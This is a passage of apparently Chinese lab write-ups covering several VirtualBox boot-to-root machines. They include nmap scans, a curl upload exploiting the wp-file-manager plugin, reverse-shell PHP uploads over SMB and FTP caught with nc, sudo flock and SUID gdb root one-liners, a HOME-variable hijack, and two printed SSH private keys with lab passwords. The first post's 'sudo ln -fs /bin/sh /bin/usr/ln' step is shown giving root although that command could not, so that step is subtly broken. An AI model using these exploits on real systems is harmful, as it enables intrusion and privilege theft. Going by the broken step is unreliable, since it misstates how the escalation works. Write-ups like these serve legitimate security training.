MAC Address: 08:00:27:D1:EB:7A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 20.85 seconds

80端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(root㉿kali)-[~/Desktop/tmp]
└─# curl 192.168.31.178
<title>RELAX</title>
<!doctype html>
<html lang="en">

<!-- Please paul, stop uploading weird .wav files using /upload_sound -->

<head>
<style>
body {
  background-image: url('screen-1.jpg');
  background-repeat: no-repeat;
  background-attachment: fixed;
  background-size: 100% 100%;
}
</style>
    <link href="bootstrap.min.css" rel="stylesheet">
    <meta name="viewport" content="width=device-width, initial-scale=1">
</head>

<body>
<audio src="relax.wav" preload="auto loop" controls></audio>
</body>

有注释paul可能是ssh的账号,relax.wav下载下了之后没有东西,/bootstrap.min.css给了一个wav文件,用Audacity分析频谱能发现dancingpassyo,ssh登录试试,登录成功

提权

1
2
3
4
5
6
7
paul@MiWiFi-RA71-srv:~$ sudo -l
sudo: unable to resolve host MiWiFi-RA71-srv: No address associated with hostname
Matching Defaults entries for paul on MiWiFi-RA71-srv:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User paul may run the following commands on MiWiFi-RA71-srv:
    (ALL : ALL) NOPASSWD: /usr/bin/ln
1
2
3
4
paul@MiWiFi-RA71-srv:~$ sudo ln  -fs /bin/sh /bin/usr/ln
sudo: unable to resolve host MiWiFi-RA71-srv: No address associated with hostname
# id
uid=0(root) gid=0(root) groups=0(root)

提权成功

发表于 分类于
本文字数: 5.1k 阅读时长 ≈ 5 分钟

信息搜集

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:7d:7d:cf, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1    a4:a9:30:df:ef:44       (Unknown)
192.168.31.22   08:00:27:63:fe:59       PCS Systemtechnik GmbH
192.168.31.85   7e:2c:58:df:4e:cb       (Unknown: locally administered)
192.168.31.220  46:3e:62:f9:1e:fa       (Unknown: locally administered)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.972 seconds (129.82 hosts/sec). 4 responded

ip为192.168.31.22. nmap扫描端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.22 --min-rate=1000 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-24 02:14 EST
Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 95.30% done; ETC: 02:15 (0:00:01 remaining)
Nmap scan report for twisted (192.168.31.22)
Host is up (0.0065s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
80/tcp   open  http
2222/tcp open  EtherNetIP-1
MAC Address: 08:00:27:63:FE:59 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 22.61 seconds

2222端口为ssh端口

80端口

1
2
3
4
5
6
7
8
9
┌──(root㉿kali)-[~/Desktop/tmp]
└─# curl 192.168.31.22
<h1>I love cats!</h1>
<img src="cat-original.jpg" alt="Cat original"  width="400" height="400">
<br>

<h1>But I prefer this one because seems different</h1>

<img src="cat-hidden.jpg" alt="Cat Hidden" width="400" height="400">

80端口存在两张jpg图片

下载下了用stegseek查看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root㉿kali)-[~/Desktop/tmp]
└─# stegseek cat-original.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "westlife"
[i] Original filename: "markus.txt".
[i] Extracting to "cat-original.jpg.out".


┌──(root㉿kali)-[~/Desktop/tmp]
└─# stegseek cat-hidden.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "sexymama"
[i] Original filename: "mateo.txt".
[i] Extracting to "cat-hidden.jpg.out".

给了两个ssh的账号密码

提权

先登录markus

1
2
3
4
markus@MiWiFi-RA71-srv:~$ cat note.txt
Hi bonita,
I have saved your id_rsa here: /var/cache/apt/id_rsa
Nobody can find it.

给了一个提示,是bonita用户的id_rsa

suid提权看看

1
2
3
4
5
6
7
8
9
10
11
12
13
markus@MiWiFi-RA71-srv:~$ find / -perm -u=s 2>/dev/null
/home/bonita/beroot
/usr/bin/su
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device

/home/bonita/beroot这个很可疑但是没有权限,登录mateo看看

1
2
mateo@MiWiFi-RA71-srv:~$ cat note.txt
/var/www/html/gogogo.wav

下载下了,用Audacity查看,能发现这是莫斯,解码得到

1
GO DEEPER... COME WITH ME... LITTLE RABBIT...

没啥用

1
2
3
mateo@MiWiFi-RA71-srv:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/tail = cap_dac_read_search+ep

getcap可以查看文件的特殊权限,tail可以读取

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
mateo@MiWiFi-RA71-srv:~$ tail /var/cache/apt/id_rsa -n 100
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA8NIseqX1B1YSHTz1A4rFWhjIJffs5vSbAG0Vg2iTa+xshyrmk6zd
FyguFUO7tN2TCJGTomDTXrG/KvWaucGvIAXpgV1lQsQkBV/VNrVC1Ioj/Fx3hUaSCC4PBS
olvmldJg2habNOUGA4EBKlTwfDi+vjDP8d77mF+rvA3EwR3vj37AiXFk5hBEsqr9cWeTr1
vD5282SncYtJb/Zx0eOa6VVFqDfOB7LKZA2QYIbfR7jezOdX+/nlDKX8Xp07wimFuMJpcF
gFnch7ptoxAqe0M0UIEzP+G2ull3m80G5L7Q/3acg14ULnNVs5dTJWPO2Fp7J2qKW+4A5C
tt0G5sIBpQAAA8hHx4cBR8eHAQAAAAdzc2gtcnNhAAABAQDw0ix6pfUHVhIdPPUDisVaGM
gl9+zm9JsAbRWDaJNr7GyHKuaTrN0XKC4VQ7u03ZMIkZOiYNNesb8q9Zq5wa8gBemBXWVC
xCQFX9U2tULUiiP8XHeFRpIILg8FKiW+aV0mDaFps05QYDgQEqVPB8OL6+MM/x3vuYX6u8
DcTBHe+PfsCJcWTmEESyqv1xZ5OvW8PnbzZKdxi0lv9nHR45rpVUWoN84HsspkDZBght9H
uN7M51f7+eUMpfxenTvCKYW4wmlwWAWdyHum2jECp7QzRQgTM/4ba6WXebzQbkvtD/dpyD
XhQuc1Wzl1MlY87YWnsnaopb7gDkK23QbmwgGlAAAAAwEAAQAAAQAuUW5GpLbNE2vmfbvu
U3mDy7JrQxUokrFhUpnJrYp1PoLdOI4ipyPa+VprspxevCM0ibNojtD4rJ1FKPn6cls5gI
mZ3RnFzq3S7sy2egSBlpQ3TJ2cX6dktV8kMigSSHenAwYhq2ALq4X86WksGyUsO1FvRX4/
hmJTiFsew+7IAKE+oQHMzpjMGyoiPXfdaI3sa10L2WfkKs4I4K/v/x2pW78HIktaQPutro
nxD8/fwGxQnseC69E6vdh/5tS8+lDEfYDz4oEy9AP26Hdtho0D6E9VT9T//2vynHLbmSXK
mPbr04h5i9C3h81rh4sAHs9nVAEe3dmZtmZxoZPOJKRhAAAAgFD+g8BhMCovIBrPZlHCu+
bUlbizp9qfXEc8BYZD3frLbVfwuL6dafDVnj7EqpabmrTLFunQG+9/PI6bN+iwloDlugtq
yzvf924Kkhdk+N366FLDt06p2tkcmRljm9kKMS3lBPMu9C4+fgo9LCyphiXrm7UbJHDVSP
UvPg4Fg/nqAAAAgQD9Q83ZcqDIx5c51fdYsMUCByLby7OiIfXukMoYPWCE2yRqa53PgXjh
V2URHPPhqFEa+iB138cSgCU3RxbRK7Qm1S7/P44fnWCaNu920iLed5z2fzvbTytE/h9QpJ
LlecEv2Hx03xyRZBsHFkMf+dMDC0ueU692Gl7YxRw+Lic0PQAAAIEA82v3Ytb97SghV7rz
a0S5t7v8pSSYZAW0OJ3DJqaLtEvxhhomduhF71T0iw0wy8rSH7j2M5PGCtCZUa2/OqQgKF
eERnqQPQSgM0PrATtihXYCTGbWo69NUMcALah0gT5i6nvR1Jr4220InGZEUWHLfvkGTitu
D0POe+rjV4B7EYkAAAAOYm9uaXRhQHR3aXN0ZWQBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----

ssh登陆,将beroot下载ida分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
int __fastcall main(int argc, const char **argv, const char **envp)
{
  int v4; // [rsp+1Ch] [rbp-4h] BYREF

  printf("Enter the code:\n ");
  scanf("%i", &v4);
  if ( v4 == 5880 )
  {
    setuid(0);
    setgid(0);
    system("/bin/bash");
  }
  else
  {
    puts("\nWRONG");
  }
  return 0;
}

只要输入等于5880就会执行/bin/bash

1
2
3
4
bonita@MiWiFi-RA71-srv:~$ ./beroot
Enter the code:
 5880
root@MiWiFi-RA71-srv:~#

提权结束

发表于 分类于
本文字数: 2.9k 阅读时长 ≈ 3 分钟

信息搜集

1
2
3
4
5
6
7
8
9
10
11
12

┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:7d:7d:cf, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1    a4:a9:30:df:ef:44       (Unknown)
192.168.31.165  08:00:27:6c:16:9b       PCS Systemtechnik GmbH
192.168.31.187  a6:9b:e0:2d:30:9a       (Unknown: locally administered)
192.168.31.220  46:3e:62:f9:1e:fa       (Unknown: locally administered)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.976 seconds (129.55 hosts/sec). 4 responded

ip为192.168.31.165 ,nmap扫描端口

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.165 --min-rate=1000 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-24 00:19 EST
Nmap scan report for vulny (192.168.31.165)
Host is up (0.049s latency).
Not shown: 65533 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
33060/tcp open  mysqlx
MAC Address: 08:00:27:6C:16:9B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 28.56 seconds

开了一个mysql服务和http的服务

80端口

扫描目录能扫出来有一个secret的目录

1
2
3
┌──(root㉿kali)-[~/Desktop/tmp]
└─# curl http://192.168.31.165/secret/
Neither <b>/etc/wordpress/config-192.168.31.165.php</b> nor <b>/etc/wordpress/config-168.31.165.php</b> could be found. <br/> Ensure one of them exists, is readable by the webserver and contains the right password/username

提示了要去看/etc/wordpress/config-168.31.165.php,可以看出来这是一个wordpress的框架,wp-content存在目录遍历

Index of /secret/wp-content/uploads/2020/10这里能发现一个压缩包wp-file-manager-6.O.zip,这个插件存在任意文件上传

1
curl -F cmd=upload -F target=l1_ -F upload[]=@rev.php -XPOST "http://192.168.31.165/secret/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"

上传一个反弹shell的文件

访问http://192.168.31.165/secret/wp-content/plugins/wp-file-manager/lib/files/rev.php

进行反弹shell

1
2
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

提权

cd进/etc/wordpress,

1
2
3
www-data@vulny:/etc/wordpress$ ls
ls
config-192.168.1.122.php  htaccess

文件名和80端口的不一样,猜测可能是80端口是ip地址输出的文件名

1
2
3
4
5
6
7
8
9
10
www-data@vulny:/etc/wordpress$ cat c*
cat c*
<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'wordpress');
define('DB_PASSWORD', 'myfuckingpassword');
define('DB_HOST', 'localhost');
define('DB_COLLATE', 'utf8_general_ci');
define('WP_CONTENT_DIR', '/usr/share/wordpress/wp-content');
?>

给了mysql的账号密码,这还有wordpress的路径,查看wp-config.php有一行注释很突出

1
/* idrinksomewater */

登录mysql,找不到有用的东西

查看/etc/passwd有一个adrian可以登录,注释就是密码

1
2
3
4
5
www-data@vulny:/usr/share/wordpress$ su adrian
su adrian
Password: idrinksomewater

adrian@vulny:/usr/share/wordpress$
1
2
3
4
5
6
7
8
adrian@vulny:/$ sudo -l
sudo -l
Matching Defaults entries for adrian on vulny:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User adrian may run the following commands on vulny:
    (ALL : ALL) NOPASSWD: /usr/bin/flock
1
2
3
adrian@vulny:/$ sudo -u root /usr/bin/flock -u / /bin/bash
sudo -u root /usr/bin/flock -u / /bin/bash
root@vulny:/

提权成功

发表于 分类于
本文字数: 5.6k 阅读时长 ≈ 5 分钟

信息搜集

1
2
3
4
5
6
7
8
┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:7d:7d:cf, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1    a4:a9:30:df:ef:44       (Unknown)
192.168.31.85   7e:2c:58:df:4e:cb       (Unknown: locally administered)
192.168.31.116  08:00:27:26:b1:6f       PCS Systemtechnik GmbH
192.168.31.220  46:3e:62:f9:1e:fa       (Unknown: locally administered)

ip为192.168.31.116,nmap扫描端口

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.116 --min-rate=1000 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-23 06:29 EST
Nmap scan report for hommie (192.168.31.116)
Host is up (0.00041s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:26:B1:6F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 10.27 seconds

80端口

1
2
3
4
5
┌──(root㉿kali)-[~/Desktop/tmp]
└─# curl 192.168.31.116
alexia, Your id_rsa is exposed, please move it!!!!!
Im fighting regarding reverse shells!
-nobody

80端口目录也扫描不到,只给了一个提示,alexia的id_rsa泄露了,去看21端口

21端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
┌──(root㉿kali)-[~/Desktop/tmp]
└─# ftp anonymous@192.168.31.116
Connected to 192.168.31.116.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||35772|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0               0 Sep 30  2020 index.html
226 Directory send OK.
ftp> ls -al
229 Entering Extended Passive Mode (|||35347|)
150 Here comes the directory listing.
drwxr-xr-x    3 0        113          4096 Sep 30  2020 .
drwxr-xr-x    3 0        113          4096 Sep 30  2020 ..
drwxrwxr-x    2 0        113          4096 Jan 23 06:12 .web
-rw-r--r--    1 0        0               0 Sep 30  2020 index.html
226 Directory send OK.
ftp> cd .web
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||27864|)
150 Here comes the directory listing.
-rw-r--r--    1 106      113            35 Jan 23 06:12 1.phtml
-rw-r--r--    1 0        0              99 Sep 30  2020 index.html
-rw-r--r--    1 106      113          5493 Jan 23 06:09 rev.php
226 Directory send OK.

21端口有匿名登录,存在.web目录,可以往80端口传文件,但是不解析php,只能放弃

tftp

扫描udp端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.116 --min-rate=1000 -sU --top-ports 20
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-23 06:34 EST
Nmap scan report for hommie (192.168.31.116)
Host is up (0.00053s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    open|filtered dhcps
68/udp    open|filtered dhcpc
69/udp    open|filtered tftp
123/udp   open|filtered ntp
135/udp   closed        msrpc
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
139/udp   open|filtered netbios-ssn
161/udp   closed        snmp
162/udp   open|filtered snmptrap
445/udp   open|filtered microsoft-ds
500/udp   open|filtered isakmp
514/udp   closed        syslog
520/udp   open|filtered route
631/udp   open|filtered ipp
1434/udp  open|filtered ms-sql-m
1900/udp  open|filtered upnp
4500/udp  open|filtered nat-t-ike
49152/udp open|filtered unknown
MAC Address: 08:00:27:26:B1:6F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.95 seconds

tftp的服务开着,结合80端口给的提示

1
2
3
┌──(root㉿kali)-[~/Desktop/tmp]
└─# tftp 192.168.31.116
tftp> get id_rsa

可以下载下来alexia的id_rsa

ssh登录

提权

找有suid的命令

1
2
3
4
5
6
7
8
9
10
11
12
13
alexia@MiWiFi-RA71-srv:~$ find / -perm -u=s 2>/dev/null
/opt/showMetheKey
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/su
/usr/bin/mount
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/umount

/opt/showMetheKey很可疑啊,运行一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
alexia@MiWiFi-RA71-srv:~$ /opt/showMetheKey
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEApwUR2Pvdhsu1RGG0UIWmj2yDNvs+4VLPG0WWisip6oZrjMjJ40h7
V0zdgZSRFhMxx0/E6ilh2MiMbpAuogCqC3MEodzIzHYAJyK4z/lIqUNdHJbgLDyaY26G0y
Rn1XI+RqLi5NUHBPyiWEuQUEZCMOqi5lS1kaiNHmVqx+rlEs6ZUq7Z6lzYs7da3XcFGuOT
gCnBh1Wb4m4e14yF+Syn4wQVh1u/53XGmeB/ClcdAbSKoJswjI1JqCCkxudwRMUYjq309j
QMxa7bbxaJbkb3hLmMuFU7RGEPu7spLvzRwGAzCuU3f60qJVTp65pzFf3x51j3YAMI+ZBq
kyNE1y12swAAA8i6ZpNpumaTaQAAAAdzc2gtcnNhAAABAQCnBRHY+92Gy7VEYbRQhaaPbI
M2+z7hUs8bRZaKyKnqhmuMyMnjSHtXTN2BlJEWEzHHT8TqKWHYyIxukC6iAKoLcwSh3MjM
dgAnIrjP+UipQ10cluAsPJpjbobTJGfVcj5GouLk1QcE/KJYS5BQRkIw6qLmVLWRqI0eZW
rH6uUSzplSrtnqXNizt1rddwUa45OAKcGHVZvibh7XjIX5LKfjBBWHW7/ndcaZ4H8KVx0B
tIqgmzCMjUmoIKTG53BExRiOrfT2NAzFrttvFoluRveEuYy4VTtEYQ+7uyku/NHAYDMK5T
d/rSolVOnrmnMV/fHnWPdgAwj5kGqTI0TXLXazAAAAAwEAAQAAAQBhD7sthEFbAqtXEAi/
+suu8frXSu9h9sPRL4GrKa5FUtTRviZFZWv4cf0QPwyJ7aGyGJNxGZd5aiLiZfwTvZsUiE
Ua47n1yGWSWMVaZ55ob3N/F9czHg0C18qWjcOh8YBrgGGnZn1r0n1uHovBevMghlsgy/2w
pmlMTtfdUo7JfEKbZmsz3auih2/64rmVp3r0YyGrvOpWuV7spnzPNAFUCjPTwgE2RpBVtk
WeiQtF8IedoMqitUsJU9ephyYqvjRemEugkqkALBJt91yBBO6ilulD8Xv1RBsVHUttE/Jz
bu4XlJXVeD10ooFofrsZd/9Ydz4fx49GwtjYnqsda0rBAAAAgGbx1tdwaTPYdEfuK1kBhu
3ln3QHVx3ZkZ7tNQFxxEjYjIPUQcFFoNBQpIUNOhLCphB8agrhcke5+aq5z2nMdXUJ3DO6
0boB4mWSMml6aGpW4AfcDFTybT6V8pwZcThS9FL3K2JmlZbgPlhkX5fyOmh14/i5ti7r9z
HlBkwMfJJPAAAAgQDPt0ouxdkG1kDNhGbGuHSMAsPibivXEB7/wK7XHTwtQZ7cCQTVqbbs
y6FqG0oSaSz4m2DfWSRZc30351lU4ZEoHJmlL8Ul6yvCjMOnzUzkhrIen131h/MStsQYtY
OZgwwdcG2+N7MReMpbDA9FSHLtHoMLUcxShLSX3ccIoWxqAwAAAIEAzdgK1iwvZkOOtM08
QPaLXRINjIKwVdmOk3Q7vFhFRoman0JeyUbEd0qlcXjFzo02MBlBadh+XlsDUqZSWo7gpp
ivFRbnEu2sy02CHilIJ6vXCQnuaflapCNG8MlG5CtpqfyVoYQ3N3d0PfOWLaB13fGeV/wN
0x2HyroKtB+OeZEAAAANYWxleGlhQGhvbW1pZQECAwQFBg==
-----END OPENSSH PRIVATE KEY-----

把alexia的id_rsa输出了,将这个二进制文件拖下来放进ida看看

1
2
3
4
5
6
7
int __fastcall main(int argc, const char **argv, const char **envp)
{
  setuid(0);
  setgid(0);
  system("cat $HOME/.ssh/id_rsa");
  return 0;

他是查看环境变量里HOME变量下的.ssh/id_rsa,可以修改HOME变量读取root的id_rsa

1
2
3
4
5
6
7
alexia@MiWiFi-RA71-srv:~$ export HOME=/root
alexia@MiWiFi-RA71-srv:/home/alexia$ env
SHELL=/bin/bash
PWD=/home/alexia
LOGNAME=alexia
XDG_SESSION_TYPE=tty
HOME=/root

再次运行拿到root的id_rsa,登录即可

发表于 分类于
本文字数: 4k 阅读时长 ≈ 4 分钟

信息搜集

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~/Desktop/script]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:7d:7d:cf, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1    a4:a9:30:df:ef:44       (Unknown)
192.168.31.77   08:00:27:2a:5f:aa       PCS Systemtechnik GmbH
192.168.31.220  46:3e:62:f9:1e:fa       (Unknown: locally administered)
192.168.31.187  a6:9b:e0:2d:30:9a       (Unknown: locally administered)
192.168.31.85   7e:2c:58:df:4e:cb       (Unknown: locally administered)

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.984 seconds (129.03 hosts/sec). 5 responded

ip为192.168.31.77,nmap扫描端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kali)-[~/Desktop/script]
└─# nmap 192.168.31.77 --min-rate=1000 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-22 09:09 EST
Nmap scan report for connection (192.168.31.77)
Host is up (0.00064s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:2A:5F:AA (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 11.11 seconds

445端口

开启了445端口

用enum4linux进行枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
 =================================( Share Enumeration on 192.168.31.77 )=================================


        Sharename       Type      Comment
        ---------       ----      -------
        share           Disk
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (Private Share for uploading files)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            CONNECTION

[+] Attempting to map shares on 192.168.31.77

//192.168.31.77/share   Mapping: OK Listing: OK Writing: N/A
//192.168.31.77/print$  Mapping: DENIED Listing: N/A Writing: N/A

[E] Can't understand response:

NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//192.168.31.77/IPC$    Mapping: N/A Listing: N/A Writing: N/A

smbclint可以匿名登陆share里有一个html,随便往里传一个文件发现在80端口访问到,传一个反弹shell的php文件

1
2
3
4
5
6
7
8
9
┌──(root㉿kali)-[~/Desktop/script]
└─# smbclient  //192.168.31.77/share
Password for [WORKGROUP\root]:
Anonymous login successful
smb: \> cd html\
smb: \html\>
smb: \html\> put rev.php
putting file rev.php as \html\rev.php (447.0 kb/s) (average 447.0 kb/s)
smb: \html\> exit
1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[~/Desktop/script]
└─# nc -lvnp 5555
listening on [any] 5555 ...
connect to [192.168.31.129] from (UNKNOWN) [192.168.31.77] 45632
Linux connection 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
 09:12:44 up 4 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

接收到shell了

提权

用python获得一个更好的终端

1
2
$  python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@connection:/$

查找suid文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
www-data@connection:/$ find / -perm -u=s 2>/dev/null
find / -perm -u=s 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/su
/usr/bin/passwd
/usr/bin/gdb
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/mount
/usr/bin/gpassw

可以利用gdb进行suid提权

https://gtfobins.github.io/gtfobins/gdb/

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
www-data@connection:/$ gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
<mport os; os.execl("/bin/sh", "sh", "-p")' -ex quit
GNU gdb (Debian 8.2.1-2+b3) 8.2.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word".
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)

发现进到root组里了,提权结束